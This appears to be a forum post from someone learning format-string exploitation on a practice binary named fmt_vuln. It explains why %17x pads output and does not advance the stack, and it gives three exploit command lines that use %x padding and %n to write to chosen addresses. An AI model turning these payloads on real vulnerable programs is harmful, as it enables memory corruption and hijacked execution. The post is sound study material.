OH! So %17x would go down the memory only once and pad it, I knew that %x would go down the memory by 4 bytes and it seemed obvious that %17x would thus go down by 17*4 = 68 bytes!!

The two conditions you want (below), as I said in the last post, do work. And now we know why it does.


./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08"`%x%x%142x%n%17x%n

./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n12345678912345678%n


And now we know why the following doesn't work, since the %17x makes the stack grow and hence overshoot the 2nd address.


./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n%17x%n

Maestr0 has saved the day. Actually more than a day!